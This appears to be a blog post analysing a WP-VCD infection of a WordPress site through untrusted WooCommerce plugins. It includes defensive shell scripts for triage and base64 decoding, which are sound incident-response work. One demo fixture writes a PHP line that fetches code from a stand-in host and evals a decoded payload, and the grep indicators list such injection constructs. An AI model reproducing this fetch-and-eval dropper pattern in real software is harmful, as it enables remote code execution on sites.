While recently maintaining a WordPress website for a client, I came across a weird piece of code that caught my attention:
I was able to see the referenced script through my personal web crawler, Kraken.
The tool is not yet available to the public, as I am finishing a few touches, but here is the relevant part of the generated report:
Here are a few of the domains that were randomly added to pages:
Here is a pastebin of the formatted code recovered from the dolohen domain:
I noticed pretty fast that the first strings set in the variable a were base64-encoded. Running a small loop, I reversed the strings, as you can see in the list in this pastebin:
Back to the infection
Knowing quite well how the WordPress ecosystem functions, I started looking at what could have changed in the files. I ran the following command:
find . -type f -mtime -10
This lists all files created or modified in the past 10 days (-mtime checks modification time, not creation time, so edited core files show up too). I noticed that a few files had been added to my wp-includes folder.
Looking at the code in those files, I noticed a lot of code that called external URLs or tried to inject data into the database.
At this point I knew the website had been compromised. I ran a plugin scan and detected two plugins that were harmful to the website:
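The triage described above, as an added example that is not the author's code: recent_files() is the find command parameterised, and flag_suspicious() greps the recent files for constructs typical of injected PHP (remote fetches, eval of decoded payloads, direct database writes). The indicator list and the sample tree are assumptions constructed for the demo so it runs offline; the file names and contents do not reproduce the real infection.

```shell
#!/bin/sh
# Added example (not the author's code): triage a WordPress tree by listing
# recently modified files and flagging lines that look like injected PHP.

# Regular files modified in the last $2 days under $1 (the author's
# "find . -type f -mtime -10"). -mtime checks modification time, so edited
# files are caught as well as new ones, but a backdated file (touch -t) is missed.
recent_files() {
    find "$1" -type f -mtime "-$2"
}

# Print file:line:text for every line in a recent file matching the indicators.
# The indicator list is an assumption chosen for this demo, not an exhaustive
# signature set; tune it for the site being examined.
flag_suspicious() {
    recent_files "$1" "$2" | while IFS= read -r f; do
        grep -nE 'base64_decode|eval\(|file_get_contents\([^)]*https?://|curl_(init|exec)|\$wpdb->(query|insert)' "$f" \
            | sed "s|^|$f:|"
    done
}

# Constructed sample tree: one legitimate, backdated file and one fresh file
# that mimics the behaviour described above (it is inert; nothing is executed).
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-includes"
    printf '<?php\nfunction wp_sample_helper() { return "ok"; }\n' \
        > "$dir/wp-includes/class-wp-sample-helper.php"
    touch -t 202001010000 "$dir/wp-includes/class-wp-sample-helper.php"
    printf '<?php\n$a = base64_decode("aGVsbG8=");\n@file_get_contents("http://example.invalid/code.txt");\neval($a);\n' \
        > "$dir/wp-includes/wp-sample-injected.php"
    echo "$dir"
}

# Run with "demo" to see it on the constructed tree; on a real site run
# flag_suspicious /path/to/wordpress 10 from a shell instead.
if [ "${1-}" = "demo" ]; then
    d=$(make_sample_tree)
    flag_suspicious "$d" 10
    rm -rf "$d"
fi
```

Every hit still has to be read by hand: base64_decode and file_get_contents appear in legitimate plugins too, so the value of the grep is narrowing hundreds of recent files down to a handful worth opening, not deciding by itself what is malicious.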
- woocommerce cost of goods
- woocommerce customer order csv export
From here on, I kept investigating and found more and more code that those plugins had injected. In a way it is pretty smart, as the external links are only added if the visitor isn't part of the managing team, so an administrator browsing the site never sees the injected content.
Looking at WP-VCD
Some of the code executed through those plugins was placed in a file called:
Here is a copy of the file:
By decoding the first base64 string, installcode, we can clearly see the malicious intent of the code. Here is a copy of the installcode reversed:
From this install code we can clearly see how it sends a request to a remote domain to fetch code (line 69), which is later written into a file.
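The decoding step used both for the strings in variable a and for the installcode string, as an added example that is not the author's loop: extract_b64() pulls quoted base64-looking literals out of a PHP file and peel_b64() decodes them, peeling off further layers while the result is still base64. The sample file, variable names and two-layer payload are constructed for the demo so it runs offline; the real dropper code is not reproduced.

```shell
#!/bin/sh
# Added example (not the author's code): extract quoted base64 literals from a
# PHP file and decode them, including nested base64-in-base64 layers.

# base64-encode $1 as a single line (GNU base64 wraps at 76 columns).
b64() {
    printf '%s' "$1" | base64 | tr -d '\n'
}

# Print every quoted string of 16+ base64 characters in file $1, one per line.
extract_b64() {
    grep -oE "['\"][A-Za-z0-9+/]{16,}={0,2}['\"]" "$1" | tr -d "'\""
}

# Decode $1 repeatedly while the result still looks like base64 (length >= 16,
# multiple of 4, base64 alphabet only); stop at the first layer that is plain
# text or fails to decode. base64 is obfuscation, not encryption: a literal
# that refuses to decode may have been transformed further (for example
# reversed), which this demo does not attempt to undo.
peel_b64() {
    s=$1
    while [ "${#s}" -ge 16 ] && [ $(( ${#s} % 4 )) -eq 0 ] \
          && printf '%s' "$s" | grep -qxE '[A-Za-z0-9+/]+={0,2}'; do
        dec=$(printf '%s' "$s" | base64 -d 2>/dev/null) || break
        s=$dec
    done
    printf '%s\n' "$s"
}

# "literal => fully decoded text" for every literal found in file $1.
decode_all() {
    extract_b64 "$1" | while IFS= read -r lit; do
        printf '%s => %s\n' "$lit" "$(peel_b64 "$lit")"
    done
}

# Constructed sample file: $a holds one base64 layer, $installcode holds two.
make_sample_php() {
    f=$(mktemp)
    inner='<?php echo "sample payload"; ?>'
    printf '<?php\n$a = "%s";\n$installcode = "%s";\n' \
        "$(b64 "$inner")" "$(b64 "$(b64 "$inner")")" > "$f"
    echo "$f"
}

# Run with "demo" to decode the constructed file; on a recovered dropper run
# decode_all /path/to/suspect.php instead.
if [ "${1-}" = "demo" ]; then
    f=$(make_sample_php)
    decode_all "$f"
    rm -f "$f"
fi
```

Decode on a workstation, never on the infected host, and only ever print the result: the decoded layers are PHP meant to be passed to eval, and reading them is the whole point.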
We can see in the install code how it clearly creates the following file:
Here is a dump of said file:
Having later checked and compared against backups, logs, file information and more, I'm pretty sure the infection came from those plugins, as installing them was the only action the client took in the days leading up to the event.
Upon further investigation, I can't verify from which source the plugins were downloaded, but this is a clear example of why companies should take the time to analyze their needs and not hesitate to pay for the functionality they want instead of going to shady sources.
The result of wanting to save a few dollars was a widespread infection of the platform, which took many hours of meticulous analysis to clean up and make the platform functional once more.